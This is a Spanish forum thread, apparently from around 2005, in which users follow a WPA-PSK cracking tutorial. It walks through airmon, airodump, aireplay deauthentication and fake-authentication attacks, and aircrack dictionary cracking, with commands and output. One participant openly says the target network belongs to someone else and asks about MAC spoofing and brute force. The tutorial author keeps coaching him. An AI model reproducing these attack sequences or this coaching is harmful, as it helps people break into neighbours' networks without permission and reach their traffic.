 Autor
|
Tema: Tutorial basico para demostrar (in)seguridad WPA-PSK (Leído 131,387 veces)
|
bruli
 Desconectado
Mensajes: 19
|
Hola.
Pues siguiendo tu manual yo me he encontrado con un problemilla (o eso creo).
He utilizado una tarjeta c54rc pcmcia (ralink) en un equipo con debian, y otro equipo, que es el único que está conectado al router wireless (3com 812 OfficeConnect wireless 11g), con w2k y la tarjeta SMC 2862W-G usb. Este último es el que tiene acceso y puede navegar.
Estos son los pasos que he seguido:
Pongo la tarjeta en modo monitor:
# airmon.sh start eth1
usage: /usr/sbin/airmon.sh <start|stop> <interface> [channel]
Interface Chipset Driver
eth1 Ralink b/g rt2500 (monitor mode enabled)
Escaneo las redes disponibles:
# airodump eth1 bruli 0
BSSID PWR Beacons # Data CH MB ENC ESSID
XX:XX:XX:XX:XX:XX -1 17 1 11 54 WPA bruli
XX:XX:XX:XX:XX:XX -1 14 0 6 54 OPN SMC
BSSID STATION PWR Packets ESSID
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX 1 bruli
Me interesa el canal 11 ESSID bruli
Vuelvo a poner la tarjeta en modo monitor apuntando al canal 11:
#airmon.sh start eth1 11
Escaneo el canal 11:
# airodump eth1 bruli 11
BSSID PWR Beacons # Data CH MB ENC ESSID
XX:XX:XX:XX:XX:XX -1 0 0 11 -1
XX:XX:XX:XX:XX:XX -1 3 0 11 48 WEP? linksys
XX:XX:XX:XX:XX:XX -1 515 301 11 54 WPA bruli
BSSID STATION PWR Packets ESSID
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX 302 bruli
¿Significa algo el -1 del PWR?. En tu ejemplo veo qu te da otros números.
Empezamos el ataque 0:
#aireplay -0 5 -a MAC_AP -c MAC_CLIENT eth1
Tengo que añadirle la interfaz, pues de lo contrario no funciona. En tu manual no lo pones así. ¿?
Finalmente el aircrack:
# aircrack -a 2 -w copia/Manuals/contenido/administración/Seguridad/diccionarios/all bruli.cap
Opening bruli.cap
Read 2813 packets.
# BSSID ESSID Encryption
1 XX:XX:XX:XX:XX:XX bruli WPA (0 handshake)
2 XX:XX:XX:XX:XX:XX SMC None (0.0.0.0)
Index number of target network ? 1
No valid WPA handshakes found.
El archivo del diccionario tiene la contraseña introducida. La he puesto manualmente: echo contraseña>>/home/diccionario
¿Que me puede estar fallando?.
|
|
|
|
|
En línea
|
Saludos.
|
|
|
|
Hwagm
|
Lo del -1 no importa nada. Te falla esto: # BSSID ESSID Encryption
1 XX:XX:XX:XX:XX:XX bruli WPA (0 handshake)
2 XX:XX:XX:XX:XX:XX SMC None (0.0.0.0) es decir no tienes el trafico correcto. #aireplay -0 5 -a MAC_AP -c MAC_CLIENT eth1
Tengo que añadirle la interfaz, pues de lo contrario no funciona. En tu manual no lo pones así. ¿?
pues vaya cagada la mia. si si............. si que estaba puesto, solo que tenemos interface distintasaireplay -0 5 ath0 -a MAC_AP -c MAC_CLIENTE Primero la lacptura y luego el ataque, desenchufa el cable de la adsl a ver que pasa. Yo use la rt2500 para nevegar y la athors para craquear. Baja la velocidad de la tarjeta antes del ataque 0. Hasta que no aparezca un 1 handshake lo del diccionarios no sirve. Ten encuenta que pillar trafico de este solo se produce en el moento de la conexion, pues primero prepara la caotura, y luego haz la conexion normal.
|
|
|
|
« Última modificación: 4 Octubre 2005, 22:30 por Hwagm »
|
En línea
|
|
|
|
bruli
Desconectado
Mensajes: 19
|
Hola de nuevo.
¿Y cual sería el modo correcto de cambiar la velocidad?. Es decir. En tu manual dices que: iwconfig eth1 rate 54M (para velocidad 54mb).
¿Entonces para bajarla debería hacer (p.e.), parar airodump "iwconfig eth1 rate 48M" y luego volver a iniciar airodump y luego probar aircrack?, ¿y así sucesivamente hasta ver un 1 en handshake?.
Gracias y saludos.
|
|
|
|
|
En línea
|
Saludos.
|
|
|
|
Hwagm
|
No el airodump siempre corriendo y eso para siempre.
1.- iwconfig eth1 rate 54M
2.- ataque 0 y esperas un poquito.
3.- Copias el fichero *.cap con otro nombre y miras con el aircrack.Si sale 1 handshake bien si no........
4.- iwconfig eth1 rate 54M
5.-ataque 0 y esperas un poquito.
6.- Copias el fichero *.cap con otro nombre y miras con el aircrack.Si sale 1 handshake bien si no........
Y asi hasta 24M, y si quieres pruebas con todo las velocidades hasta 11M.
Pero si es tu misma tarjeta y tu mismo router pues sera suficiente con 24M.
Y sobre todo paciencia, no creas que siempre sale a la primera.
Pero una vez ejecutado el airodump con el argumento 11 del canal lo cierres nunca. Hasta que no veas un 1 handshake.
|
|
|
|
« Última modificación: 4 Octubre 2005, 22:32 por Hwagm »
|
En línea
|
|
|
|
|
Hwagm
|
lo descuelgo por poco exito
|
|
|
|
|
En línea
|
|
|
|
|
|
ryusan
Desconectado
Mensajes: 27
|
buenas hwagm, estoy siguiengo tus instrucciones... me quedo anclado en el mismo sitio que nuestro compi, no cojo el trafico adecuado... aqui tengo el hilo del post http://foro.elhacker.net/index.php/topic,93943.0.htmlpuedes pasarlo para acá... y así si alguien tiene el mismo problema que yo...pues a ver si entre todos se lo solucionamos... gracias saludos |
|
|
|
|
En línea
|
|
|
|
|
Hwagm
|
Lo he traido solo que no sale tu nombre. ESTO ES DE: ryusanbuenas aki seguimos al pie del cañón... a ver si hago brecha, y entramos los indios al fuerte Randal... mira, me quedo en el paso que me comentas... -airmon.sh star rausb0 11 -iwconfig rausb0 rate 1M -airodump rausb0 out 11.... http://www.usuarios.lycos.es/airsoftgta/temp/airodump11.jpgpero aki me surge la duda de antes, detecta el ap con protección Wpa, en la parte superior de la pantalla, pero en la inferior no, ni tampoco a sus clientes. Que tiene dos, pues me meto en el kismet, y así me lo indica. Será lo que me dices, que son conexiones de cable, no de wireless. Entonces me surgen varias preguntas: 1debo esperar a que algún cliente suyo de la red por cable se conecte, y capturarlo con el airodump??? no funciona, ya lo he intentado, me dice el aircrack que 0 handshake por cierto, el ap "enemigo" está muy cerca de mí... http://www.usuarios.lycos.es/airsoftgta/temp/aircrack11.jpg2hay alguna forma de cambiar mi mac por una de sus clientes, y cuando no estén conectados, intentar entrar como si fuesen los clientes autorizados...algún atake...???...mandar paketes...y capturar respuestas??? he intentado ifconfig rausb0 hw ether 00:11:22....pero no me deja... también he intentado: aireplay -1 30 -e ssid -a macap -h maccliente rausb0 y me dice que ...Attack was unsuccessful también he intentado mandar paketes arp, pero no manda nada, sent = 0 bueno que estoy haciendo mal??? se puede entrar en un ap wireless que solo tiene clientes conectados por cable??? por cierto, El Ap está protegido por WPA-PSK y encima tiene HIDE ESSID, eso desde windows, no se ve el nombre del ap, pero sí desde linux, ya lo conocía el nombre verdadero antes de que ocultase el nombre. Será por eso que no detecto a los clientes desde el airodump??? como podría capturar los paquetes desde el kismet, para luego meterle el aircrack??? |
|
|
|
« Última modificación: 20 Diciembre 2005, 04:42 por Hwagm »
|
En línea
|
|
|
|
|
Hwagm
|
airmon.sh star rausb0 11
iwconfig rausb0 rate 1M
airodump rausb0 out 11
( a secas)
aireplay -0 5 -a mac_ap rausb0
Y no hay mas. Luego:
aircrack *.capY como vas a detectar el intercambio de cables entre una red wifi y una cableada. Si no hay clientes en el airodump, pues olvidalo. Lo que no entiendo es que me dices que el ataque 1 te lo permite, eso es imposible si es wpa.
|
|
|
|
|
En línea
|
|
|
|
ryusan
Desconectado
Mensajes: 27
|
seguiré intentándolo...
iré probando por otros lados...a ver ...
tres últimas dudas:
1 el tener el ap su ssid oculto (en win xp), tiene que ver algo con que el tráfico de sus clientes, me refiero, al tener el ap hide ssid, el airodump no detecta el tráfico entre el ap y sus clientes, o no tiene nada que ver...(si no, ta claro, al no detectar el airodump tráfico entre el ap y sus clientes, es que van por cable)
2 en el caso que la comunicación del ap y sus clientes sea por cable: conozoco todo del ap en cuestión, menos la clave del wpa, sé las mac de los clientes y el ap, sé la dirección del pa, y la dns, y la dirección ip de mi equipo para entrar en red...podría utilizar el conjunto de éstos datos para hacer pasar mi ordenador por uno de esos clientes???
3 como puedo hacer un atake bruto para intentar descubrir la clave a palo seco...me refiero, una vez que me funcionó el Whax, habia una aplicacion que te conectaba directamente a la red, pero en el caso de la wpa, me pedia la clave...hay en ese campo, es posible cargar algun programita que empieze a meter claves, por un tubo??? sin que cuenten como intento cada vez que pone una clave, porque solo te dan tres intentos???
cositas que sé del ap:
Internet Settings
WAN Connection Type PPPOA
Status CONNECTED
Internet IP address
Subnet Mask
ISP Gateway Address
Primary DNS
Secondary DNS
WAN MAC Address
LAN Settings
LAN IP address
LAN Subnet Mask
DHCP Server Enabled
DHCP Range
LAN MAC Address
esta son las cositas que sé del ap, seguro que sirven para meterle mano ...pero cómo???
dime qué camino coger y lo andaré...
tengo dos pcs, y dos dispositivos usb wireless, con uno desde win estoy intentando hacer cositas...y con el otro desde linux troppix 1.1 toi capturando tol rato...
haber si suelta ya un handshake...
|
|
|
|
« Última modificación: 11 Noviembre 2005, 01:46 por ryusan »
|
En línea
|
|
|
|
|
Hwagm
|
1 el tener el ap su ssid oculto (en win xp), tiene que ver algo con que el tráfico de sus clientes, me refiero, al tener el ap hide ssid, el airodump no detecta el tráfico entre el ap y sus clientes, o no tiene nada que ver...(si no, ta claro, al no detectar el airodump tráfico entre el ap y sus clientes, es que van por cable)
no tiene nada que ver, si no los pillas, o son de cable o estan mas lejos.
2 en el caso que la comunicación del ap y sus clientes sea por cable: conozoco todo del ap en cuestión, menos la clave del wpa, sé las mac de los clientes y el ap, sé la dirección del pa, y la dns, y la dirección ip de mi equipo para entrar en red...podría utilizar el conjunto de éstos datos para hacer pasar mi ordenador por uno de esos clientes???
no. pero yo digo hay algun ap por defecto que venga con wpa. Yo esperaria la ocasion
3 como puedo hacer un atake bruto para intentar descubrir la clave a palo seco...me refiero, una vez que me funcionó el Whax, habia una aplicacion que te conectaba directamente a la red, pero en el caso de la wpa, me pedia la clave...hay en ese campo, es posible cargar algun programita que empieze a meter claves, por un tubo??? sin que cuenten como intento cada vez que pone una clave, porque solo te dan tres intentos???
ese ataque es el que hace el aircarck. Si puedes probar pero la posibilidad es infima
cositas que sé del ap:
Internet Settings
WAN Connection Type PPPOA
Status CONNECTED
Internet IP address
Subnet Mask
ISP Gateway Address
Primary DNS
Secondary DNS
WAN MAC Address
LAN Settings
LAN IP address
LAN Subnet Mask
DHCP Server Enabled
DHCP Range
LAN MAC Address
esta son las cositas que sé del ap, seguro que sirven para meterle mano ...pero cómo???
dime qué camino coger y lo andaré...
si no puedes entrar en el ap como sabes esas cosas, es tu equipo.
tengo dos pcs, y dos dispositivos usb wireless, con uno desde win estoy intentando hacer cositas...y con el otro desde linux troppix 1.1 toi capturando tol rato...
haber si suelta ya un handshake...
Tienes 2 pc, pero el de win esta configurador para trabajar con el ap con wpa-psk, si es asi lo tienes pero que muy facil.
! el linux y luego enciende windows
|
|
|
|
|
En línea
|
|
|
|
ryusan
Desconectado
Mensajes: 27
|
buenas no es mi equipo sé estás cositas porque entré el primer día que lo conectó, y taba en bragas...con el tiempo, ha ido poniendo cada vez más seguridad... tengo varias redes a mi alcance, pero esta es la única que tiene wpa, y solo quiero saber que soy capaz de saltarmela y punto...si quiero conectarme a internet, con conectarme a otra cualquiera, lo haría, pero soy cabesón y me gustan los retos...sobre todo porque nunca me había metido en el mundillo del linux, y ahora es la excusa perfecta... seguimos... mira... desde airodump, me decteta dos aps, el a y el b después parece que captura los paquetes del ap b, pero el que me interesa es el ap A, entiendo, que si no aparece en la parte de abajo, es que no hay tráfico, o es por cable la comunicación entre cliente y ap A. El ap A está cerca y sus clientes también, menos de 10 metros...  el kismet, me dice que detro del ap que quiero asaltar, hay dos clientes...del tipo F, que como no sé inglé, a ver si arguien me puede decir que significa ésto...  gracias por tu paciencia |
|
|
|
|
En línea
|
|
|
|
|
Hwagm
|
Pues anda que no lo dice bien clarito que son cableados.
Ni sabia que el Kismet te daba esa info.
Solo toca esperar. Prueba el fin de semana, a ver que tal
|
|
|
|
|
En línea
|
|
|
|
|
Hwagm
|
Ya que me han comunicado que el tutorial que esta en la web y que es igual a este, ha salido en cierto sitio, lo vuevo a pegar temporalmente.
|
|
|
|
|
En línea
|
|
|
|
ryusan
Desconectado
Mensajes: 27
|
bueno, yo sigo en lo mio......
siguiendo tu consejo...
intentando capturar un handshake de un equipo conectado por cable a un router inhalambrico...pero esto no funciona...
llevo varios dias y nada...
por una parte pienso que es logico...que el handshake, si no hay autorizacion/conexion por ondas, no capturará nada...
para capturar la autorizacion (handshake) pienso que debo hacerlo con el kismet, que es quien me detecta los dos equipos conectados al router wireless por cable...
como puedo capturar trafico con el kismet y utilizarlo con el aircrack...???
es posible ésto...???
gracias
|
|
|
|
|
En línea
|
|
|
|
|
 |
